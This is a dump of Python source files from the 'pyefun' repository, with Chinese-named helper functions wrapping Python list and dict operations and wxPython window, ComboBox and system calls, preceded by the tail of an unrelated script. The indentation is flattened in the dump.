trip_duration_stats(fdf)
user_stats(fdf, city)
print_filtered(fdf, month, months, day, days)
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower() != 'yes':
break
if __name__ == "__main__":
main()
``` |
{
"source": "1431241631/pyefun",
"score": 4
} |
#### File: pyefun/pyefun/arrayActionBase.py
```python
import random


class 数组:
def __init__(self, data: list = []):
self.val = list(data)
def 加入成员(self, object):
self.val.append(object)
def 统计成员次数(self, object):
return self.val.count(object)
def 查找成员(self, object):
return self.val.index(object)
def 弹出成员(self, index: int = -1):
return self.val.pop(index)
def 插入成员(self, object, index: int = -1):
self.val.insert(index, object)
def 移除成员(self, object):
self.val.remove(object)
def 翻转(self):
self.val.reverse()
def 排序(self, **kwargs):
# cmp=None, key=None, reverse=False
# cmp -- 可选参数, 如果指定了该参数会使用该参数的方法进行排序。
# key -- 主要是用来进行比较的元素,只有一个参数,具体的函数的参数就是取自于可迭代对象中,指定可迭代对象中的一个元素来进行排序。
# reverse -- 排序规则,reverse = True 降序, reverse = False 升序(默认)。
self.val.sort(**kwargs)
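    # Usage sketch (illustrative values): sort a list of tuples by their first element, descending.
    #   成员列表 = 数组([(3, 'c'), (1, 'a'), (2, 'b')])
    #   成员列表.排序(key=lambda 成员: 成员[0], reverse=True)
    #   成员列表.取所有成员()  # -> [(3, 'c'), (2, 'b'), (1, 'a')]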
    def 从大到小(self, 下标=0):
        self.排序(reverse=True, key=lambda d: _func_key(d, 下标))
def 从小到大(self, 下标=0):
self.排序(reverse=False, key=lambda d: _func_key(d, 下标))
def 取所有成员(self):
return self.val
def 清空(self):
self.val = []
def _func_key(d, 下标=0):
if (type(d) == tuple):
return d[下标]
return d
def 字典_取值并删除(字典, 键, 失败返回值=None):
'如果查找键不存在则返回设置的失败返回值,该值可空'
return 字典.pop(键, 失败返回值)
def 字典_取指定键值(字典, 键, 失败返回值=None):
'如果查找键不存在则返回设置的失败返回值'
return 字典.get(键, 失败返回值)
def 字典_清空(字典):
'清空字典内的全部元素,成功返回True'
字典.clear()
return True
def 字典_拷贝(新字典, 原字典):
    '将原字典的内容浅拷贝到新字典中,成功返回True 直接赋值拷贝值会跟着原字典改变,用copy不会'
    新字典.clear()
    新字典.update(原字典)
    return True
def 字典_生成(键值列表, 键值):
'传入键值列表创建字典,字典内的值都为设置的键值'
return dict.fromkeys(键值列表, 键值)
def 字典_转列表(字典):
'返回列表格式[(1,2),(2,3),(3,4)]'
return list(字典.items())
def 字典_取全部键(字典):
return list(字典.keys())
def 字典_取全部值(字典):
return list(字典.values())
def 字典_取出并删除最后键值(字典):
'删除字典中最后一个键跟值并以元组格式返回删除的键跟值'
return 字典.popitem()
def 字典_取值添加(字典, 键, 值=None):
'如果查找键不存在则返回设置的失值且为字典新建该键值'
return 字典.setdefault(键, 值)
def 列表_转字典(列表):
'将[(1,2),(3,4)]转换成{1:2,3:4}'
字典 = dict()
for x in 列表: 字典[x[0]] = x[1]
return 字典
def 列表_合并为字典(列表1, 列表2):
'传入两个列表转换成字典 [1,2],[8,9]==>{1:8,2:9}'
return dict(zip(列表1, 列表2))
def 列表_加入成员(列表, 值):
'成功返回True'
列表.append(值)
return True
def 列表_插入成员(列表, 位置, 值):
'成功返回True 在指定位置插入指定值'
列表.insert(位置, 值)
return True
def 列表_取出现次数(列表, 值):
'搜索时 True 会当成1 False 是0'
return 列表.count(值)
def 列表_合并列表(列表, 新列表):
'成功返回True 在列表后面追加新的列表或元组成员进去'
列表.extend(新列表)
return True
def 列表_查找成员位置(列表, 值):
return 列表.index(值)
def 列表_取值并删除(列表, 位置=None):
'取出列表的一个成员值 并删除该成员,默认最后一个,位置为0则为第一个'
if 位置 == None:
return 列表.pop()
else:
return 列表.pop(位置)
def 列表_删除指定值(列表, 值):
'成功返回True 删除列表中找到的第一个值'
列表.remove(值)
return True
def 列表_倒序排列(列表):
'成功返回True 把列表的成员顺序到过来排序'
列表.reverse()
return True
def 列表_大小排序(列表, 排序方式=False):
'成功返回True 排序的列表只能全为整数型的,排序方式True为从大到小,默认False从小到大'
列表.sort(reverse=排序方式)
return True
def 数组_按成员长度排序(数组):
'传入一个序列,根据成员的长度排序 长的在前面'
return sorted(数组, key=lambda i: len(i), reverse=True)
def 数组_按子成员大小排序(数组, 成员索引):
'处理数组内包含数组需要排序的'
return sorted(数组, key=lambda i: i[成员索引])
def 数组_取随机成员数组(数组, 数量):
'失败返回False,在指定数组内随机取出指定数量的成员组成新数组返回'
return random.sample(数组, 数量)
def 数组_取随机成员(数组):
'可以传入字符 元组 列表登录,随机取出一个值'
return random.choice(数组)
```
#### File: wxefun/component/ComboBox.py
```python
import wx
from .wxControl import *
class 组合框(wx.ComboBox, 公用方法):
pass
@组件_异常检测
def 取指定项目索引(self,项目文本,是否区分大小写=False):
return self.FindString(项目文本,是否区分大小写)
def 取项目数(self):
return self.GetCount()
def 取选中项索引(self):
return self.GetCurrentSelection()
def 取选中项索引2(self):
return self.GetSelection()
def 取选中范围(self):
return self.GetTextSelection()
@组件_异常检测
def 取指定项目文本(self,索引):
return self.GetString(索引)
def 取选中项文本(self):
return self.GetStringSelection()
def 列表项是否为空(self):
return self.IsListEmpty()
def 弹出列表(self):
self.Popup()
@组件_异常检测
def 置指定项目文本(self,索引,文本):
self.SetString(索引,文本)
@组件_异常检测
def 置默认文本(self,文本):
self.SetValue(文本)
@组件_异常检测
def 置选中项(self,索引):
self.SetSelection(索引)
@组件_异常检测
def 置选中项_文本(self,项目文本):
return self.SetStringSelection(项目文本)
@组件_异常检测
def 选中范围文本(self,开始位置,结束位置):
'如果两个参数都等于-1,则选择控件中的所有文本'
self.SetTextSelection(开始位置,结束位置)
def 清空表项(self):
self.Clear()
@组件_异常检测
def 置项目列表(self,项目列表):
'会覆盖原有的项目列表'
self.SetItems(项目列表)
@组件_异常检测
def 加入项目(self,项目):
'支持单个或多个项目,多个项目使用列表传入,加入后会返回最后一个项目索引'
return self.Append(项目)
@组件_异常检测
def 加入项目2(self,项目):
'支持单个或多个项目,多个项目使用列表传入'
self.AppendItems(项目)
@组件_异常检测
def 删除指定项目(self,索引):
self.Delete(索引)
@组件_异常检测
def 插入项目(self,插入位置,项目列表):
return self.Insert(项目列表,插入位置)
```
#### File: pyefun/wxefun/func.py
```python
import datetime
import traceback
def 组件_异常检测(function):
'装饰器'
def box(*args, **kwargs):
try:
return function(*args, **kwargs)
except:
print(function.__name__, "函数发生异常")
print("错误发生时间:", str(datetime.datetime.now()))
print("错误的详细情况:", traceback.format_exc())
return box
@组件_异常检测
def 窗口_取窗口句柄(组件):
'取wxpython组件的窗口句柄'
return 组件.GetHandle()
@组件_异常检测
def 窗口_取组件祖组件(组件):
'取wxpython组件的上上层组件,[当前-父组件-祖组件]'
return 组件.GetGrandParent()
@组件_异常检测
def 窗口_对齐(组件,方向=12):
'默认居中,使组件在父组件内对齐,主窗口则在屏幕中间,1.左上 4/5.顶边 8/9.左边 12/13.居中'
return 组件.Center(方向)
@组件_异常检测
def 窗口_取桌面相对坐标(组件,x=0,y=0):
'返回相对于此组件的坐标转换为屏幕坐标,x,y为偏移位置,0为当前'
return 组件.ClientToScreen(x,y)
@组件_异常检测
def 窗口_关闭(窗口,关闭=True):
'用来关闭窗口'
return 窗口.Close(关闭)
@组件_异常检测
def 窗口_销毁(窗口):
'备注写的这个方法不会立即销毁窗口,会等事件执行后才安全的销毁'
return 窗口.Destroy()
@组件_异常检测
def 窗口_销毁所有子窗口(组件):
'销毁窗口下所有的子窗口,组件'
return 组件.DestroyChildren()
@组件_异常检测
def 窗口_销毁2(窗口):
'官方解释:计划在不久的将来销毁该窗口,每当销毁可能发生得太早时(例如,当该窗口或其子级仍在事件队列中等待时),都应使用此方法'
return 窗口.DestroyLater()
@组件_异常检测
def 窗口_禁用(组件):
'组件禁用后连同子级组件也无法点击移动'
return 组件.Disable()
@组件_异常检测
def 窗口_禁用2(组件):
'启用或禁用用于用户输入的窗口'
return 组件.Enable(False)
@组件_异常检测
def 窗口_允许拖放文件(组件,允许=True):
'允许接收拖放文件'
return 组件.DragAcceptFiles(允许)
@组件_异常检测
def 窗口_ID匹配组件(父窗口,id):
'在父窗口下查找返回该ID的组件'
return 父窗口.FindWindow(id)
@组件_异常检测
def 窗口_ID匹配组件2(父窗口,id):
'在父窗口下查找返回匹配到的第一个该ID的组件,可使用wx.FindWindowById全程序查找'
return 父窗口.FindWindowById(id)
@组件_异常检测
def 窗口_取键盘焦点组件(父窗口):
'在父窗口下查找当前具有键盘焦点的窗口或控件'
return 父窗口.FindFocus()
@组件_异常检测
def 窗口_标题匹配组件(父窗口,标题):
'通过组件标题查找返回匹配到的第一个组件,可使用wx.FindWindowByLabel全程序查找'
return 父窗口.FindWindowByLabel(标题)
@组件_异常检测
def 窗口_名称匹配组件(父窗口,组件名):
'通过组件标题查找返回匹配到的第一个组件,可使用wx.FindWindowByName全程序查找'
return 父窗口.FindWindowByName(组件名)
@组件_异常检测
def 窗口_自动调整尺寸(组件):
'调整窗口大小以适合其最佳大小。'
return 组件.Fit()
@组件_异常检测
def 窗口_自动调整内部尺寸(组件):
'与相似Fit,但是调整窗户的内部(虚拟)尺寸,主要用于滚动窗口,以在调整大小而不会触发大小事件的情况下重置滚动条,和/或不带内部大小调整器的滚动窗口。如果没有子窗口,此功能同样不会执行任何操作。'
return 组件.FitInside()
@组件_异常检测
def 窗口_禁止重画(组件):
'冻结窗口,换句话说,阻止任何更新在屏幕上发生,窗口根本不会重绘'
return 组件.Freeze()
@组件_异常检测
def 窗口_允许重画(组件):
'重新启用窗口更新'
return 组件.Thaw()
@组件_异常检测
def 窗口_取背景颜色(组件):
'返回窗口的背景色,格式:(240, 240, 240, 255)'
return 组件.GetBackgroundColour()
@组件_异常检测
def 窗口_取样式(组件):
'样式:0.默认背景样式值,1.使用由系统或当前主题确定的默认背景,2.指示仅在用户定义的EVT_PAINT处理程序中擦除背景,3.无介绍,4.表示未擦除窗口背景,从而使父窗口得以显示'
return 组件.GetBackgroundStyle()
@组件_异常检测
def 窗口_取最小可接受尺寸(组件):
'回窗口的最佳可接受最小尺寸,返回格式:(宽度,高度),高度不包含标题栏高度'
return 组件.GetBestSize()
@组件_异常检测
def 窗口_取最大可接受尺寸(组件):
'回窗口的最佳可接受最小尺寸,返回格式:(宽度,高度),高度不包含标题栏高度'
return 组件.GetBestVirtualSize()
@组件_异常检测
def 窗口_取边框样式(组件):
'获取此窗口的标志的边框'
return 组件.GetBorder()
@组件_异常检测
def 窗口_取额外样式(组件):
'窗口的额外样式位'
return 组件.GetExtraStyle()
@组件_异常检测
def 窗口_取字体高度(组件):
'返回此窗口的字符高度'
return 组件.GetCharHeight()
@组件_异常检测
def 窗口_取平均字符宽度(组件):
'返回此窗口的平均字符宽度'
return 组件.GetCharWidth()
@组件_异常检测
def 窗口_遍历下级组件(组件):
'遍历组件下的子级组件,返回在WindowList 列表里'
return 组件.GetChildren()
@组件_异常检测
def 窗口_取字体及颜色(组件):
'返回字体,背景颜色,前景颜色,#(<wx._core.Font object at 0x000002140997DB88>, wx.Colour(240, 240, 240, 255), wx.Colour(0, 0, 0, 255))'
结果 = 组件.GetClassDefaultAttributes()
return 结果.font,结果.colBg,结果.colFg
@组件_异常检测
def 窗口_取矩形(组件):
'返回窗口矩形:(左边,顶边,宽度,高度)'
return 组件.GetRect()
@组件_异常检测
def 窗口_取矩形2(组件):
'返回窗口矩形:(0,0,宽度,高度)'
return 组件.GetClientRect()
@组件_异常检测
def 窗口_取宽高(组件):
'返回窗口实际宽高:(宽度,高度)'
return 组件.GetClientSize()
@组件_异常检测
def 窗口_取宽高2(组件):
'将窗口的最佳大小合并为最小大小,然后返回结果,返回宽高:(宽度,高度)'
return 组件.GetEffectiveMinSize()
@组件_异常检测
def 窗口_取字体(组件):
'返回此窗口的字体'
return 组件.GetFont()
@组件_异常检测
def 窗口_取前景色(组件):
'返回窗口的前景色'
return 组件.GetForegroundColour()
@组件_异常检测
def 窗口_取标记ID(组件):
'返回窗口的标识符'
return 组件.GetId()
@组件_异常检测
def 窗口_取标题(组件):
'返回窗口的标题'
return 组件.GetLabel()
@组件_异常检测
def 窗口_置工作区宽高(组件,宽度,高度):
'设置组件工作区的宽高(不包含边框,标题栏的宽高)'
return 组件.SetClientSize(宽度,高度)
@组件_异常检测
def 窗口_取工作区最小宽高(组件):
'返回窗口的工作区的最小大小,这向sizer布局机制指示这是其工作区的最小所需大小'
return 组件.GetMinClientSize()
@组件_异常检测
def 窗口_取最小宽高(组件):
'返回窗口的最小大小,这向sizer布局机制指示这是最小所需大小'
return 组件.GetMinSize()
@组件_异常检测
def 窗口_取组件名称(组件):
'返回窗口的名称'
return 组件.GetName()
@组件_异常检测
def 窗口_取下一窗口(组件):
'返回此窗口之后的下一个窗口(同一级窗口里)'
return 组件.GetNextSibling()
@组件_异常检测
def 窗口_取上一窗口(组件):
'返回父级的子级中前一个的前一个窗口'
return 组件.GetPrevSibling()
@组件_异常检测
def 窗口_取父级窗口(组件):
'返回窗口的父级,或者返回没有父级的窗口None'
return 组件.GetParent()
@组件_异常检测
def 窗口_弹出菜单(组件,菜单,左边,顶边):
'此函数在此窗口中的给定位置显示一个弹出菜单,并返回所选的ID'
return 组件.GetPopupMenuSelectionFromUser(菜单,左边,顶边)
@组件_异常检测
def 窗口_取左边顶边(组件):
'这将获得相对于子窗口的父窗口或相对于顶级窗口的显示原点的窗口位置(以像素为单位),格式:(左边,顶边)'
    return 组件.GetPosition()
@组件_异常检测
def 窗口_取窗口相对屏幕坐标(组件):
'返回窗口在屏幕坐标中的位置,无论该窗口是子窗口还是顶级窗口,格式:(相对于屏幕的左边,相对于屏幕的顶边)'
return 组件.GetScreenPosition()
@组件_异常检测
def 窗口_取窗口相对屏幕矩形(组件):
'返回窗口在屏幕坐标中的位置,无论该窗口是子窗口还是顶级窗口,格式:(相对于屏幕的左边,相对于屏幕的顶边,组件宽度,组件高度)'
return 组件.GetScreenRect()
@组件_异常检测
def 窗口_取内置滚动条位置(组件,方向):
'返回内置滚动条的位置,方向:4.横向滚动条 8.纵向滚动条'
return 组件.GetScrollPos(方向)
@组件_异常检测
def 窗口_取内置滚动条范围(组件,方向):
'返回内置滚动条范围,方向:4.横向滚动条 8.纵向滚动条'
return 组件.GetScrollRange(方向)
@组件_异常检测
def 窗口_取内置滚动条缩略图大小(组件,方向):
'返回内置滚动条的缩略图大小,方向:4.横向滚动条 8.纵向滚动条'
return 组件.GetScrollThumb(方向)
@组件_异常检测
def 窗口_置滚动条位置(组件,方向,位置,重绘):
'设置滚动条位置,方向可选4或8,重绘True或False(设置内置滚动条之一的位置)'
return 组件.SetScrollPos(方向,位置,重绘)
@组件_异常检测
def 窗口_置滚动条属性(组件,方向,位置,可见大小,最大位置,重绘):
'''
设置滚动条位置,方向可选4或8,重绘True或False(设置内置滚动条之一的位置)
假设您希望使用相同的字体显示50行文本。窗口的大小设置为一次只能看到16行。您将使用:
self.SetScrollbar(wx.VERTICAL, 0, 16, 50)
'''
return 组件.SetScrollbar(方向,位置,可见大小,最大位置,重绘)
@组件_异常检测
def 窗口_取完整窗口宽高(组件):
'返回整个窗口的大小(以像素为单位),包括标题栏,边框,滚动条等。如果此窗口是顶级窗口,并且当前已最小化,则返回的大小是还原的窗口大小,而不是窗口图标的大小'
return 组件.GetSize()
@组件_异常检测
def 窗口_是否使用系统主题设置背景(组件):
'窗口是否使用系统主题绘制其背景'
return 组件.GetThemeEnabled()
@组件_异常检测
def 窗口_取顶级窗口(组件):
'返回此窗口(顶级窗口)的第一个祖先'
return 组件.GetTopLevelParent()
@组件_异常检测
def 窗口_取虚拟宽高(组件):
'出错返回False,这将获取窗口的虚拟大小,它返回窗口的客户端大小,但是在调用SetVirtualSize 它之后,将返回使用该方法设置的大小'
return 组件.GetVirtualSize()
@组件_异常检测
def 窗口_是否有焦点(组件):
'窗口(或在复合控件的情况下,其主子窗口)是否具有焦点'
return 组件.HasFocus()
@组件_异常检测
def 窗口_是否有滚动条(组件,方向):
'返回此窗口当前是否具有该方向的滚动条,方向:4.横向滚动条 8.纵向滚动条'
return 组件.HasScrollbar(方向)
@组件_异常检测
def 窗口_是否透明(组件):
'返回此窗口背景是否透明(例如,对于 wx.StaticText),并应显示父窗口背景'
return 组件.HasTransparentBackground()
@组件_异常检测
def 窗口_隐藏(组件):
'此功能可隐藏一个窗口'
return 组件.Hide()
@组件_异常检测
def 窗口_隐藏带特效(组件,效果,效果时长):
'''
此功能可隐藏一个窗口并使用特殊的视觉效果
效果:0.无效果,1.向左滚动窗口,2.向右滚动窗口,3.将窗口滚动到顶部,4.将窗口滚动到底部,5.向左滑动窗口,6.向右滑动窗口,7.将窗口滑动到顶部,8.将窗口滑动到底部,9.淡入或淡出效果,10.扩大或崩溃的作用
效果时长:单位毫秒
'''
return 组件.HideWithEffect(效果,效果时长)
@组件_异常检测
def 窗口_显示带特效(组件,效果,效果时长):
'''
此功能可隐藏一个窗口并使用特殊的视觉效果
效果:0.无效果,1.向左滚动窗口,2.向右滚动窗口,3.将窗口滚动到顶部,4.将窗口滚动到底部,5.向左滑动窗口,6.向右滑动窗口,7.将窗口滑动到顶部,8.将窗口滑动到底部,9.淡入或淡出效果,10.扩大或崩溃的作用
效果时长:单位毫秒
'''
return 组件.ShowWithEffect(效果,效果时长)
@组件_异常检测
def 窗口_是否继承父级背景色(组件):
'如果此窗口从其父级继承背景色,则返回True'
return 组件.InheritsBackgroundColour()
@组件_异常检测
def 窗口_是否继承父级前景色(组件):
'如果此窗口从其父级继承前景色,则返回True'
return 组件.InheritsForegroundColour()
@组件_异常检测
def 窗口_重置缓存最佳大小(组件):
'重置缓存的最佳大小值,以便下次需要时重新计算'
return 组件.InvalidateBestSize()
@组件_异常检测
def 窗口_是否正在销毁(组件):
'此窗口是否正在销毁中'
return 组件.IsBeingDeleted()
@组件_异常检测
def 窗口_是否为下级窗口(组件,对比组件):
'检查指定的窗口是否是该窗口的后代,窗口是否为该窗口的后代(例如,子代或孙代或子孙或……)返回True'
return 组件.IsDescendant(对比组件)
@组件_异常检测
def 窗口_是否禁用(组件):
'是否启用了窗口,即是否接受用户输入'
return 组件.IsEnabled()
@组件_异常检测
def 窗口_是否可获取焦点(组件):
'判断窗口是否可以获取焦点'
return 组件.IsFocusable()
@组件_异常检测
def 窗口_是否禁止重画(组件):
'判断窗口是否可已经禁止重画'
return 组件.IsFrozen()
@组件_异常检测
def 窗口_是否始终显示滚动条(组件,方向):
'判断滚动条是否始终显示,方向:4.横向滚动条 8.纵向滚动条'
return 组件.IsScrollbarAlwaysShown(方向)
@组件_异常检测
def 窗口_是否隐藏(组件):
'判断是否调用命令隐藏了窗口,最小化,遮挡,不算隐藏'
return 组件.IsShown()
@组件_异常检测
def 窗口_是否显示在屏幕上(组件):
'判断是否调用命令隐藏了窗口,最小化,遮挡,不算隐藏'
return 组件.IsShownOnScreen()
@组件_异常检测
def 窗口_是否启用(组件):
'是否从本质上启用了此窗口,False否则返回'
return 组件.IsThisEnabled()
@组件_异常检测
def 窗口_是否为顶级窗口(组件):
'窗口是否为顶级窗口'
return 组件.IsTopLevel()
@组件_异常检测
def 窗口_向下滚动(组件):
'与ScrollLines (1)相同,返回True是否滚动窗口,False如果窗口已经在底部,则什么也不做'
return 组件.LineDown()
@组件_异常检测
def 窗口_向上滚动(组件):
'与ScrollLines (-1)相同,返回True是否滚动窗口,False如果窗口已经在顶部,则什么也不做'
return 组件.LineUp()
@组件_异常检测
def 窗口_滚动_页(组件,滚动页数=1):
'滚动页数:向上滚动1次为-1,向下为1'
return 组件.ScrollPages(滚动页数)
@组件_异常检测
def 窗口_滚动_行(组件,滚动行数=1):
'滚动行数:向上滚动1次为-1,向下为1'
return 组件.ScrollLines(滚动行数)
@组件_异常检测
def 窗口_移动左边顶边(组件,左边,顶边):
'调整移动窗口的左边跟顶边位置'
return 组件.Move(左边,顶边)
@组件_异常检测
def 窗口_移动左边顶边2(组件,左边,顶边):
'调整移动窗口的左边跟顶边位置'
return 组件.SetPosition((左边,顶边))
@组件_异常检测
def 窗口_移动(组件,左边=-1,顶边=-1,宽度=-1,高度=-1):
'调整移动窗口的左边跟顶边位置并重新设置宽度跟高度,不想调整的填-1'
return 组件.SetSize(左边,顶边,宽度,高度)
@组件_异常检测
def 窗口_设置切换顺序_上(组件,上一个组件):
'调整TAB切换的顺序,当上一个组件按TAB后焦点就会到当前组件上'
return 组件.MoveAfterInTabOrder(上一个组件)
@组件_异常检测
def 窗口_设置切换顺序_下(组件,下一个组件):
'调整TAB切换的顺序,当前组件按TAB后焦点会切换到下一个组件'
return 组件.MoveBeforeInTabOrder(下一个组件)
@组件_异常检测
def 窗口_生成组件ID(组件):
'创建一个新的ID或当前未使用的ID范围,格式:-31987'
return 组件.NewControlId()
@组件_异常检测
def 窗口_重绘指定区域(组件,矩形=(0,0,0,0),擦除背景=True):
'重绘指定矩形的内容:仅对其内部的区域进行重绘'
return 组件.RefreshRect(矩形,擦除背景)
@组件_异常检测
def 窗口_修改父级窗口(组件,新父级组件):
'即该窗口将从其当前父窗口中移除加入到新的父级窗口下'
return 组件.Reparent(新父级组件)
@组件_异常检测
def 窗口_桌面坐标转窗口内坐标(组件,x,y):
'从屏幕转换为客户端窗口内工作区坐标,'
return 组件.ScreenToClient(x,y)
@组件_异常检测
def 窗口_到最顶层(组件):
return 组件.Raise()
@组件_异常检测
def 窗口_到最底层(组件):
return 组件.Lower()
@组件_异常检测
def 窗口_是否已设置背景色(组件):
return 组件.UseBackgroundColour()
@组件_异常检测
def 窗口_是否已设置前景色(组件):
return 组件.UseForegroundColour()
@组件_异常检测
def 窗口_置背景颜色(组件,颜色):
return 组件.SetBackgroundColour(颜色)
@组件_异常检测
def 窗口_单独置背景颜色(组件,颜色):
'设置窗口的背景色,但防止其被该窗口的子级继承'
return 组件.SetOwnBackgroundColour(颜色)
@组件_异常检测
def 窗口_置前景颜色(组件,颜色):
return 组件.SetForegroundColour(颜色)
@组件_异常检测
def 窗口_单独置前景颜色(组件,颜色):
'设置窗口的前景色,但防止其被该窗口的子代继承'
return 组件.SetOwnForegroundColour(颜色)
@组件_异常检测
def 窗口_置标识ID(组件,ID):
return 组件.SetId(ID)
@组件_异常检测
def 窗口_置宽高(组件,宽度,高度):
return 组件.SetInitialSize((宽度,高度))
@组件_异常检测
def 窗口_置最大宽高(组件,宽度,高度):
'设置整个窗口最大尺寸范围'
return 组件.SetMaxSize((宽度,高度))
@组件_异常检测
def 窗口_置最小宽高(组件,宽度,高度):
'设置整个窗口最大尺寸范围'
return 组件.SetMinSize((宽度,高度))
@组件_异常检测
def 窗口_置工作区最大宽高(组件,宽度,高度):
'设置窗口的最大客户端大小(不包含标题栏菜单栏状态栏的尺寸),以向sizer布局机制指示这是其客户端区域的最大可能大小'
return 组件.SetMaxClientSize((宽度,高度))
@组件_异常检测
def 窗口_置工作区最小宽高(组件,宽度,高度):
'设置窗口的最大客户端大小(不包含标题栏菜单栏状态栏的尺寸),以向sizer布局机制指示这是其客户端区域的最大可能大小'
return 组件.SetMinClientSize((宽度,高度))
@组件_异常检测
def 窗口_置虚拟宽高(组件,宽度,高度):
'设置窗口的虚拟大小(以像素为单位)'
return 组件.SetVirtualSize((宽度,高度))
@组件_异常检测
def 窗口_置标题(组件,标题):
return 组件.SetLabel(标题)
@组件_异常检测
def 窗口_置名称(组件,名称):
return 组件.SetName(名称)
@组件_异常检测
def 窗口_是否允许透明(组件):
return 组件.CanSetTransparent()
@组件_异常检测
def 窗口_置透明度(组件,透明度):
'设置窗口与透明度,范围0-255(0.完全透明,255完全不透明)'
return 组件.SetTransparent(透明度)
@组件_异常检测
def 窗口_置主题样式(组件,样式):
'窗口样式:0.默认(可擦除背景),1.跟随系统主题,2.指示仅在用户定义的EVT_PAINT处理程序中擦除背景,3.表示未擦除窗口背景,从而使父窗口得以显示,4.无描述。'
return 组件.SetBackgroundStyle(样式)
@组件_异常检测
def 窗口_置窗口样式(组件,样式):
'样式:0.无边框,536870912.右上角无按钮,更多样式百度'
return 组件.SetWindowStyleFlag(样式)
@组件_异常检测
def 窗口_刷新重绘(组件,删除背景=False):
'导致GTK1重新绘制此窗口及其所有子级(除非未实现此子级)'
return 组件.Refresh(删除背景)
@组件_异常检测
def 窗口_刷新重绘2(组件):
'调用此方法将立即重新绘制窗口的无效区域及其所有子级的对象(通常仅在控制流返回事件循环时才发生)'
return 组件.Update()
@组件_异常检测
def 窗口_显示或隐藏(组件,是否显示=True):
'显示或隐藏窗口'
return 组件.Show(是否显示)
@组件_异常检测
def 窗口_移动鼠标(组件,x,y):
'将指针移动到窗口上的指定位置'
return 组件.WarpPointer(x,y)
@组件_异常检测
def 窗口_置鼠标光标样式(组件,样式):
'''样式:
0:无描述
1:标准箭头光标。
2:指向右侧的标准箭头光标。
3:靶心光标。
4:矩形字符光标。
5:十字光标。
6:手形光标。
7:工字梁光标(垂直线)。
8:表示鼠标左键按下。
9:放大镜图标。
10:表示按下中间按钮的鼠标。
11:不可输入的符号光标。
12:画笔光标。
13:铅笔光标。
14:指向左的光标。
15:指向右的光标。
16:箭头和问号。
17:表示按下了右键的鼠标。
18:调整大小的光标指向NE-SW。
19:调整大小的光标指向N-S。
20:调整大小的光标指向NW-SE。
21:调整大小的光标指向W-E。
22:一般大小的游标。
23:Spraycan游标。
24:等待光标。
25:监视光标。
26:透明光标。
27:带有标准箭头的等待光标。
28:无描述。
'''
return 组件.SetCursor(wx.Cursor(样式))
@组件_异常检测
def 窗口_设置字体(组件,字体名,大小,粗细,下划线):
'窗口样式:0.默认(可擦除背景),1.跟随系统主题,2.指示仅在用户定义的EVT_PAINT处理程序中擦除背景,3.表示未擦除窗口背景,从而使父窗口得以显示,4.无描述。'
return 组件.SetFont(wx.Font(大小,wx.DEFAULT, wx.NORMAL, 粗细, 下划线, 字体名))
@组件_异常检测
def 程序_取指定坐标处组件(x,y):
'传入桌面上坐标'
return wx.FindWindowAtPoint((x,y))
@组件_异常检测
def 程序_取鼠标处组件跟坐标():
'取当前鼠标下面的组件及坐标,返回格式:(组件,(x,y)),返回的坐标是相对于桌面的坐标'
return wx.FindWindowAtPointer()
@组件_异常检测
def 程序_取屏幕工作区矩形():
'取屏幕工作区矩形(不包含任务栏宽高),格式:(0,0,1920,1040) 任务栏占了40'
return wx.GetClientDisplayRect()
@组件_异常检测
def 程序_取屏幕分辨率():
'返回格式:(1920,1080)'
return wx.GetDisplaySize()
@组件_异常检测
def 程序_取屏幕尺寸():
'返回以毫米为单位的显示尺寸,格式:(508,286)'
return wx.GetDisplaySizeMM()
@组件_异常检测
def 程序_恢复默认鼠标光标():
'对于应用程序中的所有窗口,将光标更改回原始光标'
return wx.EndBusyCursor()
@组件_异常检测
def 程序_重置所有鼠标光标(光标类型):
'''将光标更改为应用程序中所有窗口的给定光标
光标类型:
0:无描述
1:标准箭头光标。
2:指向右侧的标准箭头光标。
3:靶心光标。
4:矩形字符光标。
5:十字光标。
6:手形光标。
7:工字梁光标(垂直线)。
8:表示鼠标左键按下。
9:放大镜图标。
10:表示按下中间按钮的鼠标。
11:不可输入的符号光标。
12:画笔光标。
13:铅笔光标。
14:指向左的光标。
15:指向右的光标。
16:箭头和问号。
17:表示按下了右键的鼠标。
18:调整大小的光标指向NE-SW。
19:调整大小的光标指向N-S。
20:调整大小的光标指向NW-SE。
21:调整大小的光标指向W-E。
22:一般大小的游标。
23:Spraycan游标。
24:等待光标。
25:监视光标。
26:透明光标。
27:带有标准箭头的等待光标。
28:无描述。
'''
return wx.BeginBusyCursor(wx.Cursor(光标类型))
@组件_异常检测
def 程序_关闭2():
"立即结束程序"
wx.Abort()
@组件_异常检测
def 程序_关闭():
"立即结束程序,会卡顿下"
wx.Exit()
@组件_异常检测
def 程序_系统错误代码转提示文本(code):
"返回与给定系统错误代码对应的错误消息,示例:code=3 返回:系统找不到指定的路径。"
    return wx.SysErrorMsgStr(code)
@组件_异常检测
def 程序_电脑关机():
    "关闭计算机"
    wx.Shutdown(2)
@组件_异常检测
def 程序_电脑重启():
    "重启计算机"
    wx.Shutdown(4)
@组件_异常检测
def 程序_延时_微秒(时间):
"延时单位(微秒)1秒=1000000微秒"
wx.MicroSleep(时间)
@组件_异常检测
def 程序_延时_毫秒(时间):
"延时单位(毫秒)1秒=1000毫秒"
wx.MilliSleep(时间)
@组件_异常检测
def 程序_延时_秒(时间):
wx.Sleep(时间)
@组件_异常检测
def 程序_取本地英文时间():
"返回时间示例:Sun Aug 16 15:57:41 2020"
return wx.Now()
@组件_异常检测
def 程序_取程序对象():
"返回当前应用程序对象"
return wx.GetApp()
@组件_异常检测
def 程序_取程序顶级窗口列表():
"返回应用程序顶级窗口的类似列表的对象(返回顶级窗口的对象列表)"
return wx.GetTopLevelWindows()
@组件_异常检测
def 程序_取计算机名():
    "返回本机的计算机名(主机名)"
    return wx.GetHostName()
@组件_异常检测
def 程序_取系统版本信息():
"返回示例: Windows 10 (build 18363),64位版"
return wx.GetOsDescription()
@组件_异常检测
def 程序_取系统用户名():
"返回示例: Administrator"
return wx.GetUserName()
@组件_异常检测
def 程序_系统是否64位():
"返回True程序运行所在的操作系统是否为64位。"
return wx.IsPlatform64Bit()
@组件_异常检测
def 程序_打开指定网址或目录(地址):
"可以打开电脑目录或使用默认浏览器打开指定网址"
return wx.LaunchDefaultBrowser(地址)
@组件_异常检测
def 程序_打开指定网址(url):
import webbrowser
return webbrowser.open(url)
@组件_异常检测
def 程序_取鼠标坐标():
"返回鼠标坐标(x,y)"
return wx.GetMouseState().GetPosition()
@组件_异常检测
def 程序_鼠标侧键1是否按下():
    "返回True或False,判断鼠标侧边附加的按键1是否按下"
    return wx.GetMouseState().Aux1IsDown()
